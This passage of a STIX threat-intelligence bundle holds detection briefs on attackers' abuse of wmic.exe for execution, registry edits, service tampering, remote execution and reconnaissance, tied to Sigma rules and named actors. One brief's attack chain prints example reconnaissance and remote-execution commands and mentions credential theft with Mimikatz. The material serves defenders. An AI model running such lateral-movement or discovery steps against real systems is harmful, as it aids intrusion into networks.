        "windows",
        "wmic",
        "living-off-the-land"
      ],
      "object_refs": [
        "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_wmic_terminate_application.yml"
        },
        {
          "source_name": "reference",
          "url": "https://cyble.com/blog/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/"
        },
        {
          "source_name": "reference",
          "url": "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows Management Instrumentation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1047",
          "url": "https://attack.mitre.org/techniques/T1047"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9e21f88a-0370-5dcf-964f-fb1604c7e510",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7459413a-0fc7-53f6-aa0c-2fecd2a4a91b",
      "target_ref": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7459413a-0fc7-53f6-aa0c-2fecd2a4a91b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious Process Creation via WMIC.exe",
      "description": "## Overview\n\nThis brief details the suspicious use of `wmic.exe` by threat actors to execute arbitrary commands, specifically via the \"process call create\" functionality. This method allows for the creation of new processes on local or remote Windows systems. Frequently employed by ransomware operators, including groups associated with Ryuk, Hive, and Conti, this technique serves as a post-compromise execution mechanism to launch malicious payloads, establish persistence, or facilitate lateral movement within a compromised network. Although no specific campaign identifiers are provided for the exploitation of this method, its use has been consistently observed in various attacks since at least late 2020. Adversaries leverage legitimate Windows tools like `wmic.exe` to evade detection, making it crucial for defenders to identify and monitor such activity to prevent the progression of attacks.\n\n## Impact\n\nSuccessful exploitation of this technique by adversaries typically leads to the execution of malicious code, often culminating in severe outcomes such as ransomware deployment (e.g., data encryption by Ryuk, Hive, Conti), data exfiltration, system compromise, and significant business disruption. The use of `wmic.exe` as an execution vector indicates an attacker has already gained a foothold, and unchecked activity can lead to a full network compromise, rendering systems inoperable and causing substantial financial and reputational damage to affected organizations.\n\n## Recommendation\n\n*   Deploy the `Detect Suspicious Process Created Via Wmic.EXE` Sigma rule to your SIEM and tune it for your environment.\n*   Enable Sysmon process-creation logging to ensure the necessary telemetry for the `Detect Suspicious Process Created Via Wmic.EXE` rule is collected.\n*   Regularly review `wmic.exe` process creation events for unusual child processes or command-line arguments, especially those containing `rundll32`, `powershell`, or `bitsadmin`.\n",
      "published": "2026-07-03T14:57:35Z",
      "labels": [
        "ransomware",
        "living-off-the-land",
        "execution",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://thedfirreport.com/2020/10/08/ryuks-return/"
        },
        {
          "source_name": "reference",
          "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_wmic_susp_process_creation.yml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows Management Instrumentation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1047",
          "url": "https://attack.mitre.org/techniques/T1047"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cb0397a7-54a2-5cdd-8c84-d73173262920",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b4ef52e-3ce1-5994-9f10-3320a47619ee",
      "target_ref": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--7ae20902-9541-5391-8598-d72c1b1ffdfd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Modify Registry",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1112",
          "url": "https://attack.mitre.org/techniques/T1112"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5f64748f-d1bb-56da-bd59-072369f2629a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b4ef52e-3ce1-5994-9f10-3320a47619ee",
      "target_ref": "attack-pattern--7ae20902-9541-5391-8598-d72c1b1ffdfd"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--6b4ef52e-3ce1-5994-9f10-3320a47619ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Registry Manipulation via WMI Stdregprov for Evasion",
      "description": "## Overview\n\nAttackers are increasingly utilizing `wmic.exe` in conjunction with the Windows Management Instrumentation (WMI) `StdRegProv` class to perform registry modifications, a technique observed to be employed by groups such as ShrinkLocker. This method allows threat actors to execute operations such as creating, deleting, or setting registry values (e.g., `CreateKey`, `DeleteKey`, `SetStringValue`) in an unconventional manner. By employing WMI for registry manipulation, attackers aim to bypass security monitoring tools that primarily focus on detecting changes made via standard utilities like `reg.exe` or `regedit.exe`. This technique serves as a defense evasion tactic, making it more challenging for defenders to identify and respond to malicious registry changes, which can be critical for achieving persistence or altering system configurations.\n\n## Impact\n\nThe primary impact of this technique is successful defense evasion, allowing attackers to establish persistence or modify system behavior without triggering traditional registry monitoring alerts. While the direct functional damage depends on the specific registry keys modified, the use of `wmic.exe` for such operations indicates an attacker's intent to operate stealthily within an environment. If this technique goes undetected, it can enable long-term compromise, installation of malware, or complete system takeover by allowing malicious entries to be written to critical registry locations. The specific scale of victimization or targeted sectors are not detailed in this technical brief, but the underlying capability affects any Windows environment where WMI is available.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Registry Manipulation via WMI Stdregprov\" to your SIEM and tune for your environment.\n*   Ensure Sysmon process creation logging is enabled to capture `wmic.exe` executions with full command-line details.\n*   Investigate any `wmic.exe` process creations that include `stdregprov` and registry modification methods (`CreateKey`, `SetStringValue`, etc.) in their command line.\n",
      "published": "2026-07-03T14:56:55Z",
      "labels": [
        "registry-modification",
        "defense-evasion",
        "wmi",
        "windows",
        "process-creation"
      ],
      "object_refs": [
        "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee",
        "attack-pattern--7ae20902-9541-5391-8598-d72c1b1ffdfd"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.bitdefender.com/en-us/blog/businessinsights/shrinklocker-decryptor-from-friend-to-foe-and-back-again"
        },
        {
          "source_name": "reference",
          "url": "https://trustedsec.com/blog/command-line-underdog-wmic-in-action"
        },
        {
          "source_name": "reference",
          "url": "https://trustedsec.com/blog/wmi-for-script-kiddies"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/previous-versions/windows/desktop/regprov/stdregprov"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows Management Instrumentation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1047",
          "url": "https://attack.mitre.org/techniques/T1047"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ca9f5ed0-2d4c-5bee-bed4-15b8c089b55d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a0da61b2-da74-50f2-8dfa-fcc68c6f0614",
      "target_ref": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a0da61b2-da74-50f2-8dfa-fcc68c6f0614",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Detection of Service Manipulation via WMIC.exe",
      "description": "## Overview\n\nAdversaries frequently utilize Living-off-the-Land Binaries (LOLBINs) to execute malicious actions while blending in with legitimate system activity. WMIC.exe, a built-in Windows utility, is one such tool often abused for system administration tasks, including the manipulation of services. This brief focuses on detecting instances where attackers invoke `wmic.exe` with `service call startservice` or `stopservice` commands. Such activity typically occurs post-compromise, indicating that an attacker has gained a foothold and is attempting to establish persistence, elevate privileges, or facilitate lateral movement by disabling security services, enabling malicious services, or modifying system configurations. Detecting these specific command-line arguments is crucial for defenders to identify attacker activity that directly impacts system integrity and availability, often serving as an early indicator of more advanced stages of an attack chain leading to data exfiltration or ransomware deployment.\n\n## Impact\n\nSuccessful manipulation of services using `wmic.exe` can lead to various detrimental outcomes. Attackers might disable security software, ensuring their malicious tools run unimpeded. They could stop critical legitimate services, causing denial-of-service or system instability, and replace them with malicious counterparts to maintain persistence and execute commands with elevated privileges. Such actions can facilitate lateral movement within a network, lead to data exfiltration, or prepare the ground for ransomware deployment, significantly impacting business operations, data confidentiality, and system integrity. While specific victim counts are not tied to this generic technique, any organization running Windows systems is susceptible to this abuse.\n\n## Recommendation\n\n*   Deploy the \"Service Started/Stopped Via Wmic.EXE\" Sigma rule provided in this brief to your SIEM solution.\n*   Ensure comprehensive `process_creation` logging is enabled on all Windows endpoints, ideally through Sysmon, to capture detailed command-line arguments and parent-child process relationships for `wmic.exe`.\n*   Review and alert on any detected instances where `wmic.exe` is used to manipulate critical services (e.g., security agents, domain controller services, core infrastructure applications) as this may indicate active compromise.\n",
      "published": "2026-07-03T14:56:10Z",
      "labels": [
        "lolbin",
        "windows",
        "persistence",
        "execution",
        "lateral-movement"
      ],
      "object_refs": [
        "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_wmic_service_manipulation.yml"
        },
        {
          "source_name": "reference",
          "url": "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows Management Instrumentation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1047",
          "url": "https://attack.mitre.org/techniques/T1047"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2cf1f641-cb58-5d7f-81d3-090d1d82866b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cbb1f2ad-3a7f-5141-9bc2-860babe7a2a3",
      "target_ref": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--cbb1f2ad-3a7f-5141-9bc2-860babe7a2a3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "WMIC Remote Command Execution Detection",
      "description": "## Overview\n\nThis threat brief details the detection of the Windows Management Instrumentation Command-line (WMIC) utility being used to interact with remote systems. WMIC is a legitimate built-in Windows command-line utility that allows administrators to manage local and remote Windows machines using Windows Management Instrumentation (WMI). Threat actors frequently abuse WMIC to perform various malicious activities, including executing arbitrary commands, querying system information, listing processes, or creating/modifying services on remote hosts. The presence of WMIC with the `/node:` parameter indicates an attempt to target a different machine, which, if not part of legitimate administrative activity, can signify lateral movement, reconnaissance, or remote execution by an adversary. While the provided Sigma rule focuses on the technical detection aspect, this activity is a cornerstone for many sophisticated attacks to expand their footprint within an environment.\n\n## Attack Chain\n\n1.  **Initial Compromise**: An attacker gains initial access to a workstation or server (e.g., via phishing, exposed vulnerability, or credential stuffing).\n2.  **Internal Reconnaissance**: The attacker uses tools or native commands (e.g., `net group \"Domain Admins\" /domain`) to identify other systems or user accounts.\n3.  **Credential Acquisition**: Credentials, often through tools like Mimikatz or by exploiting vulnerable services, are obtained for elevated access or other user accounts.\n4.  **Lateral Movement via WMIC**: The attacker utilizes `wmic.exe` with the `/node:` parameter and valid credentials to connect to a target remote system.\n5.  **Remote Execution/Query**: On the remote system, the attacker executes commands (e.g., `process call create \"cmd /c dir C:\\\\\"`) or queries sensitive information (e.g., `ComputerSystem Get UserName`) via WMIC.\n6.  **Persistence/Further Actions**: If successful, the attacker may establish persistence on the new host, install additional malware, or continue lateral movement to other systems, ultimately aiming for data exfiltration or disruptive impact.\n\n## Impact\n\nWhile the detection of WMIC remote execution itself is an indicator of compromise rather than the final impact, its successful exploitation can lead to significant consequences. Attackers leveraging this technique can achieve arbitrary code execution on remote systems, facilitating lateral movement across the network without relying on more easily detectable tools. This enables them to gain access to sensitive data, escalate privileges, deploy ransomware, or establish long-term persistence within an organization's infrastructure. If not detected and mitigated, this activity can be a crucial step towards a full network compromise, leading to data breaches, operational disruption, and severe financial and reputational damage.\n\n## Recommendation\n\n*   Deploy the `WMIC Remote Command Execution` Sigma rule in this brief to your SIEM and tune for your environment to detect suspicious remote WMIC activity.\n*   Enable Sysmon process-creation logging (Event ID 1) to ensure the necessary telemetry for the `WMIC Remote Command Execution` rule.\n*   Implement strong credential hygiene and multi-factor authentication to prevent attackers from acquiring credentials necessary for remote WMIC execution.\n*   Restrict administrative access to systems and implement least privilege principles to limit the potential impact of a compromised account capable of using WMIC remotely.\n*   Monitor authentication logs for suspicious logon attempts against service accounts or critical systems that could precede WMIC-based lateral movement.\n",
      "published": "2026-07-03T14:55:18Z",
      "labels": [
        "lateral-movement",
        "reconnaissance",
        "execution",
        "wmic",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_wmic_remote_execution.yml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows Management Instrumentation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1047",
          "url": "https://attack.mitre.org/techniques/T1047"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2ab93d7b-2df3-50e1-b33f-df687ff4e26a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d690598b-99b4-522b-a3f6-b01bfa483388",
      "target_ref": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Information Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1082",
          "url": "https://attack.mitre.org/techniques/T1082"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2b7da78a-89d9-520f-8abb-3bf4c9e4cf96",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d690598b-99b4-522b-a3f6-b01bfa483388",
      "target_ref": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--9c3db771-c341-52ab-985b-0e7faafc5128",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Volt Typhoon"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7a4df60d-8ad0-5ec6-9dc8-568436e9eca8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "attributed-to",
      "source_ref": "report--d690598b-99b4-522b-a3f6-b01bfa483388",
      "target_ref": "threat-actor--9c3db771-c341-52ab-985b-0e7faafc5128"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d690598b-99b4-522b-a3f6-b01bfa483388",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Disk And Volume Reconnaissance Via Wmic.EXE",
      "description": "## Overview\n\nThe threat actor Volt Typhoon has been observed leveraging the native Windows Management Instrumentation Command-line (WMIC.EXE) utility to conduct comprehensive reconnaissance of victim systems. This activity, documented by CISA (AA23-144A), involves querying system disk and volume information, including volume names, sizes, and free space. This technique allows adversaries to gain a detailed understanding of the target environment's storage configuration without deploying custom tools, thereby minimizing their forensic footprint and blending in with legitimate administrative activities. This discovery phase is crucial for Volt Typhoon as it informs subsequent actions such as data staging, exfiltration planning, or identifying targets for destructive actions. Defenders must recognize these behaviors as early indicators of compromise and prevent further progression of the attack.\n\n## Impact\n\nWhile discovery actions like WMIC-based system information gathering do not directly cause damage, they are a critical precursor to more impactful stages of an attack. By understanding system disk and volume configurations, Volt Typhoon can identify valuable data repositories for exfiltration, determine available space for staging malicious payloads, or map out network shares. This knowledge allows the adversary to make informed decisions for data theft, system disruption, or ransomware deployment, potentially leading to significant financial losses, reputational damage, and operational downtime for targeted organizations across various sectors, including critical infrastructure.\n\n## Recommendation\n\n*   Deploy the \"System Disk And Volume Reconnaissance Via Wmic.EXE\" Sigma rule to your SIEM/EDR to detect suspicious WMIC activity immediately.\n*   Ensure Sysmon process_creation logging is enabled on all Windows endpoints to capture `wmic.exe` command-line arguments.\n*   Investigate any alerts generated by the \"System Disk And Volume Reconnaissance Via Wmic.EXE\" rule for context and potential malicious intent.\n",
      "published": "2026-07-03T14:54:37Z",
      "labels": [
        "discovery",
        "reconnaissance",
        "wmic",
        "living-off-the-land",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee",
        "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122",
        "threat-actor--9c3db771-c341-52ab-985b-0e7faafc5128"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows Management Instrumentation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1047",
          "url": "https://attack.mitre.org/techniques/T1047"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d9aa2313-5ae0-5bfe-93cf-785206b922c2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--09eac9bf-69c0-50fd-a6cc-bce343eba06f",
      "target_ref": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Information Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1082",
          "url": "https://attack.mitre.org/techniques/T1082"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3e845d6b-6c47-51fc-b955-4b3c679ac60c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--09eac9bf-69c0-50fd-a6cc-bce343eba06f",
      "target_ref": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--09eac9bf-69c0-50fd-a6cc-bce343eba06f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE",
      "description": "## Overview\n\nAttackers and penetration testers frequently employ `wmic.exe` as a reconnaissance tool to identify Windows services configured with unquoted executable paths. This technique involves querying service properties like `name`, `displayname`, `pathname`, and `startmode` using specific `wmic` commands. The absence of quotes around executable paths in service configurations is a well-known vulnerability (CVE-2017-1014) that can lead to privilege escalation. By dropping a malicious executable in a specific directory within an unquoted path, an attacker can trick the system into executing their code with elevated privileges when the legitimate service starts. This detection focuses on the enumeration phase, allowing defenders to identify attempts to discover these weak configurations before exploitation occurs. Early detection of such reconnaissance is crucial as it indicates an attacker actively seeking to escalate privileges on a compromised system.\n\n## Impact\n\nSuccessful exploitation of an unquoted service path vulnerability, after such reconnaissance, can lead to privilege escalation, allowing an attacker to execute arbitrary code with SYSTEM privileges. This level of access grants full control over the compromised system, enabling further lateral movement, data exfiltration, or the deployment of additional malicious payloads such as ransomware. Organizations that rely on Windows services for critical operations are particularly vulnerable, as compromise of these services can lead to severe operational disruption and data loss.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Potential Unquoted Service Path Reconnaissance Via Wmic.EXE\" to your SIEM solution to detect attacker enumeration for privilege escalation.\n*   Ensure process creation logging, especially for `wmic.exe`, is enabled and properly configured on all Windows endpoints to provide the necessary telemetry for this rule.\n*   Regularly audit Windows service configurations for unquoted paths and remediate them by ensuring all service executable paths are properly enclosed in double quotes.\n",
      "published": "2026-07-03T14:53:57Z",
      "labels": [
        "reconnaissance",
        "privilege-escalation",
        "windows",
        "wmic"
      ],
      "object_refs": [
        "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee",
        "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1"
        },
        {
          "source_name": "reference",
          "url": "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Information Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1082",
          "url": "https://attack.mitre.org/techniques/T1082"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--675deae4-5277-5bdc-b146-86dc911dccf4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4e3fc1b9-eca0-5d45-804e-3ca95577a6aa",
      "target_ref": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--0b4da7e2-26ff-5686-92d3-4dbd7a130e5c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Aurora Stealer"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fbaecc5f-3b57-5e29-821e-a4066d967459",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "attributed-to",
      "source_ref": "report--4e3fc1b9-eca0-5d45-804e-3ca95577a6aa",
      "target_ref": "threat-actor--0b4da7e2-26ff-5686-92d3-4dbd7a130e5c"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4e3fc1b9-eca0-5d45-804e-3ca95577a6aa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Uncommon WMIC System Information Discovery by Aurora Stealer",
      "description": "## Overview\n\nIn late 2022 and early 2023, the Aurora Stealer malware leveraged uncommon commands executed via the Windows Management Instrumentation Command-line (WMIC) utility for system reconnaissance. This infostealer, known for its shapeshifting tactics, utilized WMIC to enumerate detailed host characteristics including operating system caption, architecture, and version; logical disk names, sizes, and free space; as well as CPU, GPU, memory, display resolution, baseboard, and BIOS information. This activity represents a critical initial information gathering phase within an attacker's kill chain, enabling them to tailor subsequent attack stages, identify valuable data for exfiltration, or confirm suitability for further malware deployment. Defenders need to recognize these specific WMIC queries as indicators of malicious reconnaissance rather than benign system administration.\n\n## Impact\n\nWhile WMIC-based system information discovery is not directly destructive, its successful execution by threats like Aurora Stealer provides adversaries with a comprehensive understanding of the compromised environment. This reconnaissance enables attackers to identify high-value targets, plan lateral movement, and streamline data exfiltration efforts. For infostealers like Aurora, detailed system information can be crucial for tailoring further malware stages or selecting specific data types to steal, increasing the likelihood of successful data breach and financial or intellectual property loss. Organizations targeted may face significant reputational damage, regulatory fines, and costs associated with incident response and remediation.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule \"Uncommon WMIC System Information Discovery\" to your SIEM solution and tune it for your environment to detect suspicious `wmic.exe` commands.\n*   Ensure Sysmon or equivalent process creation logging is enabled on all Windows endpoints to capture command-line arguments for `wmic.exe`.\n*   Regularly review `wmic.exe` process creation events for uncommon or unauthorized command-line parameters.\n*   Educate users and administrators about the appropriate use of administrative tools like WMIC to help distinguish legitimate activity from malicious.\n",
      "published": "2026-07-03T14:52:52Z",
      "labels": [
        "windows",
        "reconnaissance",
        "discovery",
        "infostealer"
      ],
      "object_refs": [
        "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122",
        "threat-actor--0b4da7e2-26ff-5686-92d3-4dbd7a130e5c"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic"
        },
        {
          "source_name": "reference",
          "url": "https://nwgat.ninja/getting-system-information-with-wmic-on-windows/"
        },
        {
          "source_name": "reference",
          "url": "https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar"
        },
        {
          "source_name": "reference",
          "url": "https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/"
        },
        {
          "source_name": "reference",
          "url": "https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca37da/"
        },
        {
          "source_name": "reference",
          "url": "https://www.virustotal.com/gui/file/d6f6bc10ae0e634ed4301d584f61418cee18e5d58ad9af72f8aa552dc4aaeca3/behavior"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows Management Instrumentation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1047",
          "url": "https://attack.mitre.org/techniques/T1047"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a34e2b45-ee78-5e48-aab6-406fdd33284e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--53caa8a7-c2b0-513e-a4d0-ddfc8fc1c28e",
      "target_ref": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--53caa8a7-c2b0-513e-a4d0-ddfc8fc1c28e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Service Reconnaissance Via Wmic.EXE",
